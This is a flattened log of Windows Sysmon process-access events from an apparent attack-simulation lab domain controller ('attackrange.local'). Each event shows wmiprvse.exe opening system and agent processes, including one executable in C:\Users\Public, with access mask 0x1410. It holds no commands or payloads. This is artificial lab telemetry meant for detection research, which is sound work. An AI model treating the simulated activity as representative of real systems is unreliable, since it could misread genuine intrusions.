15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027591Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027590Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027589Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027588Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027587Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027586Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027585Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027584Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027583Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027582Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027581Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027580Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027579Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027578Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027577Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027576Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027575Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027574Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027573Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027572Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 